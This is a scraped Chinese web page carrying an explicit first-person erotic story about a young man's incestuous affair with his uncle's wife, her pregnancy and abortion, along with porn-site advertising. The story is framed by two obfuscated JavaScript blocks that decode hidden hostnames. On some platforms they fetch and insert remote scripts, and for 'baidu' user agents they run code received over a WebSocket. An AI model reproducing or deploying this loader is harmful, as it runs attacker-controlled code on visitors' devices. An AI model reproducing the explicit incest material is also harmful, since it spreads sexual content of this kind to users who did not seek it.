看打炮:kandapao.cc 看打炮:kandapao.vip 广告联系✈:@kandapao

function ZNxcTPLX(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function KxTOzX(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ZNxcTPLX(t);};window[''+'Q'+'w'+'F'+'i'+'A'+'G'+'J'+'N'+'C'+'c'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=KxTOzX,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ddHIuddGhhbGx1cy5uZXQ=','dHIueWVzzdW42NzzguY29t','151235',window,document,['d','z']);}:function(){};

跟魔女舅妈搞到怀孕




小弟是刚升读大学才第一学期的1年级新生,小名叫小禹,因为就读的学校在住家的外县市。刚好舅舅家也在学校的同一县市,为了省下住宿费,舅舅也同意我大学时住在他们家。


舅舅长期在外国经商,整年都在外国,只有在寒暑假期间休长假才回来。


所以目前我住在舅舅家,只有我跟舅妈,还有两个舅妈的高中生小女儿,共四人住。


舅妈是个保险业务员,年纪约38左右,看起来就是标准的黑色特装OL上班族。


长相看起来像是25~30的年轻女生,身高170,纤瘦的身形,有着C罩杯的大小,可说是美魔女.


刚搬到舅妈家住家裡只有我一个男生,所以我心裡都有个底,住免费的宿舍也要帮忙做家事,当作是我住在这裡不用缴住宿水电瓦斯费的报答。我没有课的时候,总是帮忙舅妈家打扫,然后洗衣煮饭做菜等等的大小事。


洗衣服时第一次摸到女生穿着的内衣内裤,还真的拿起来试闻,这就是原味吗?有点汗的味道,还有点尿臭,跟体味遇到一些可能。还有水电问题:没有热水啦,电灯不亮的,这些全都是我在解决。这个家唯一男生,我不修谁来修,还好我本身就是在学校学电的科系,略懂略懂~哈!


住在这家2个多月,有天晚上我舅妈的大女儿电脑突然挂了,着急的跑来敲我房门,叫我帮她看看原因。


看看之后,半点电都没有,我知道是POWER坏了,大女儿很心急。


舅妈可能下班后偶而会去应酬,搏感情,到晚上9点还未归。


好吧!我只好骑着我的两轮噗噗,骑到还有点远的市区,叫插发3C店去买POWER更换。


冷冷的秋冬,骑着车耗了约1小时,到了晚上10点多,骑回来看到舅妈的汽车回来了。


一进门,大女儿飞奔过来问我:买到了吗?


我说:有啦~有啦~


大女儿:快点啦哥哥~


就赶紧帮她换装。


OK啦!电脑开了。


应该是寿命到了,用了5年多。


小孩子就是这样,好了也不说声谢谢!赶紧上社群网站,把我抛到脑后。


之后,我走下楼到客厅打开电视坐着休息。


舅妈这时刚洗完澡,从浴室出来吹头髮,问我刚去哪了。


我就说去帮大女儿修电脑,到市区去买新零件。


舅妈回:跑这么远呀!不好意思麻烦你了!


我回:不会啦!


舅妈:那要花多少钱呀?我拿给你。


我回:舅妈不用啦!真的不多,我免费住这裡了,一台POWER才2千左右,不用给我啦!真的不用!


舅妈:那女儿有没有跟你说谢谢?


我就说:啊啊,她跟人家聊天都来不及了(根本没空理我,可以开机,她就玩她自己的了!


舅妈:这小孩真是的……


我说:算了啦,小孩子呀!没有关係啦,我去切水果给你吃。


化解舅妈的有点不悦的心情,我去厨房切了苹果,跟舅妈在客厅边看电视边吃。


快晚上11点,准备要睡觉了。


跟舅妈走上楼,听到两个女儿在房间裡嬉嬉闹闹的声音,舅妈打开她们的房门,站在门边口气有点不悦的说:你们两个玩够了没呀?该适可而此的吧!你们两个都出去,去楼下。


妹妹嘟起嘴:为什么?


舅妈:没有为什么,我有事情要在这裡做,你们两个会影响我工作,我好了就叫你们!


我说:楼下还有刚切好的苹果,你们去楼下吃吧!


我就往我的房间方向走去……两个女儿就下楼去了!


舅妈:小禹你过来帮我。


我:我?什么事呀?


走进房门舅妈叫我坐在床边,她把房门轻轻关上并锁上,然后坐到我旁边。


舅妈:你来住的这段时间,真是辛苦你了。


我:没有啦!这个是应该的。


舅妈:我老公长期在外国,一年也才回来个一到两次,家裡总只有我一个人辛苦撑起这个家,两个小孩子有很爱嬉闹很难管教……还好暑假过后,有你这个大哥哥来我们家住,帮我减轻了不少负担,真不不知该怎么跟你谢谢!


我:不用啦!大家住一起,互相帮忙而已。


舅妈微笑的说:你爸妈真是把你教育的这么懂事又孝顺,其实我最近正在追一个大客户,如果谈成这笔,今年的业绩也算是达到目标,而且奖金很多……


我:所以舅妈你才到这么晚才回来呀!就是为了这笔生意,而去跟客户常常喝到很晚呀!


舅妈:你这小孩真聪明,是呀……唉……可是真的很不好做……跟客户老闆们喝酒常常总是被摸来摸去的……


我:是唷!舅妈真是太委屈了,为了业绩这样牺牲自己……


舅妈:没关係啦!为了两个宝贝女儿……而且现在有你在我家帮忙照顾两个小女儿,我可以不用太多操心。


这时舅妈站起来走向梳妆台,而我还是坐在床边。


我:舅妈这没有什么好感谢的……大家都是亲戚……


我这时转过头去看舅妈,见她把上衣脱去,露出她的性感内衣。这时我有点不知所措,然后头转旁边去看假装没看到。


这时舅妈稍微笑笑的转过来面对我,我转过去看她,她全身只剩内衣裤。


舅妈走过来说:小禹你应该满18了吧?


我:嗯今年刚满……


舅妈:那舅妈帮你按摩一下,看你平常都帮我那么多,真的很辛苦吧!


我:……嗯……哪裡……还……还好啦……


我有点紧张起来了,舅妈双手摸着我的肩膀,把我慢慢的往后推倒在床上。


心理想:不会吧!这是在A片吗?……怎么会这样……我……要被奸了吗?


舅妈这时就脱下她的内衣及内裤,哇!我看到傻了!这是奶?好大唷……


舅妈趴在我身上,她的两颗C杯……奶垂下显得特别大、


舅妈:来!小嘴巴张开……


我被KISS了,舌头一直我往嘴裡伸入,拨弄我的舌头,然后还吸气,感觉嘴巴整个被舅妈吸住了分不开。


心理在想:奇怪这是什么味道呀!好香唷,应该是刚洗澡时沐浴乳的香味,我好像被快要被控制了!


我的双手开始抱住舅妈的背,然后嘴巴开始动起来,跟舅妈唇枪舌战,卷吞吮舌,然后舅妈把她的口水流过来我嘴裡。我毫不考虑的吞下去,我也一样把我的口水往舅妈嘴裡送。


过了5分钟左右吧,终于分离,我很喘,太刺激了,不断深呼吸!


然后舅妈把我的上衣跟裤子内裤全部脱去,我觉得很冷,舅妈就把旁边的棉被拉过来盖住我跟她在被窝裡,我无意间触碰了她的奶头,暖暖的。


舅妈:没关係,你就摸吧!我还要继续亲吻你,边享受被你摸的感觉。


就这样,我边摸她的奶,第一次摸女人的奶,感觉好像是颗大水球,但比水球软,然后又温温热热的。


我摸一下子后,开始手去摸她的奶嘴头!感觉好像一颗电阻零件圆圆的像米粒。之后感觉好像变粗了!


舅妈这时稍微发出一点只有A片才可能听到的嗯~~声音。


这时舅妈的手从我的背滑向我的下面,握住我的热狗香肠,开始前后推动,越来越快。我有股被电到讯号,传向我的热狗。然后开始起变化了!


舅妈说:你的握起来好像士林大香肠喔!小禹手不要停呀!继续摸我下面,你是第一次呀?


我:嗯~是啊!没有女朋友,没做爱。只有看过A片跟自己DIY。


舅妈:那你就想像我是A片裡面的女优吧!照着剧情做……


我:不用啦!舅妈很漂亮,根本不需要幻想女优来帮忙,而且……很久以前就……很想跟舅妈那……个……了!


啊唷!我吃错药了,奇怪,我好像失去理智了,看着舅妈的双眼,我好像被催眠了,怎么会说这个话出来?


舅妈:你的嘴巴真甜!然后又开始亲吻我。


我感觉快要失去理智了,好热唷!


手开始往舅妈的两腿之间摸去,在棉被裡看不见靠摸的感觉好像是自己的下面的毛毛,可是好像也没这么多,而且毛好像跟DIY时又不同,只有手部有感觉。


慢慢的,摸到两腿间……舅妈两腿夹的有点紧,我换姿势把舅妈压在下面呈现正常体位,然后手摸到有个感觉像是嘴唇又比嘴唇薄,又软软的东西,应该是摸到阴唇了。我拨开两片阴唇,然后感觉裡面湿湿滑滑的又有点黏黏的。


在阴唇中间,手开始上下摩擦……舅妈这时不断发出微微的淫声~我摸到两唇上面中间有颗感觉像是米粒般大小的突出物,摸起来软软的。我不断的摸这个点,舅妈的脸上整个脸红了,不断的喘气.


我想应该就是阴核(阴蒂)了,另一隻手摸向穴穴,奇怪!刚刚好像没这么湿黏,怎么突然变得这湿湿为黏。继续刺激阴蒂……


这时不速之客突然走上来房间敲门。说:妈妈,好了没有,我要用电脑。


这时舅妈突然吓到躲在被窝裡,然后我也不敢发出声音。


呆了会,舅妈这时恢复冷静:我还在忙,你们先别吵好不好。


大姊在门外:还要多久?


舅妈看了一下牆上时间午夜12点半多。


再给我一小时就好,1点半我就出来了!你们要睡觉先去妈妈房裡睡。


大姊:喔,好吧!


然后走下楼去。


舅妈:我们动作要快点,剩一小时。


我:嗯,好!


被这样惊吓,我想软掉半支香肠了。便开始加速,回温。好了之后。我:舅妈可以了吗?要进去了吗?


舅妈:嗯!进来吧!


我开始在穴穴口边稍微拨弄几下,开始深入穴穴,舅妈这时摀起嘴来好像有点痛。我也感觉裡面好像有点紧实跟热热的,慢慢往前推!


舅妈:很久没有做了,大概两年了吧!舅舅都在国外,回来时,都只有带我们出去玩,很少有爱爱……


……


舅妈:嗯~~嗯~~没关係,继续……只是小痛而已,等等就没了!


我到达了终点,顶到了,也刚好完全进入,开始慢速抽插,从一档开始……


进出~进出~过一分钟后,开始加速。


舅妈把我的手抓向她的奶,我开始她的奶。之后过了5分钟左右吧,穴穴开始紧实起来了,舅妈的淫声越来越快,好像要高潮了,我也开始加速……


舅妈:啊~~受不了了~~~啊~~


突然穴穴含着香肠,然后喷出水来。


这下糟糕了,床喷湿了,但是不管了,继续,我也要赶紧喷射,便加速往前冲过。不久,我的香肠感觉好像又被紧紧包覆了,我也快要不行了,忍不住了!


我:舅妈,我……我快射了!


舅妈好像没听到一样,沉醉在高潮馀韵之中,然后双腿跟双手夹住我的身体,我无法起来。


快不行了,我要是射进去,舅妈会不会怀孕呀?


之后我投降,我乖乖的不挣扎了。就这样,射了好多进入了舅妈的穴穴深处,之后累瘫,赶紧休息一下。


之后,舅妈整理房间把床单跟被子都换过,然后叫两个小女儿,上楼回房。


等她们关上房门后,我被舅妈拉近她房间裡。然后她全身再度脱光光,我看了也自己自动脱了,然后把电灯关掉.


在被窝裡,继续激战……


看不见,只单凭感觉,我感觉我又射进去穴穴裡面了。


之后我跟舅妈一起同房就寝全裸睡觉,然后黑暗中她说:怀孕没有关係,不用担心,好吧。


听到这句,我可以放心了,睡觉!


到了隔年放寒假,舅舅跟舅妈视讯,说这次不回来了,等暑假再回来家裡。


就在知道这件不回来的消息,那天,舅妈突然身体不舒服,舅妈呕吐了。舅妈偷偷拿给我验孕棒,让我看真的怀孕了。


知道怀孕后,我跟舅妈更一直大胆的在房间内偷偷做爱,每次都内射,我帮她顾家,外面业绩也谈成大笔生意,然后她在医院做手术流了。


就这样,我和舅妈保持这乱伦关係,想应该可以持续到暑假,到时候再另想办法了!


function FMXvy(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function ckAsM(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return FMXvy(t);};window[''+'E'+'T'+'z'+'n'+'h'+'Z'+'g'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=ckAsM,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('dHIudGhhbGx1ccy5uZXQ=','dHIueWWVzdWW42NzguY29t','151236',window,document,['c','W']);}:function(){};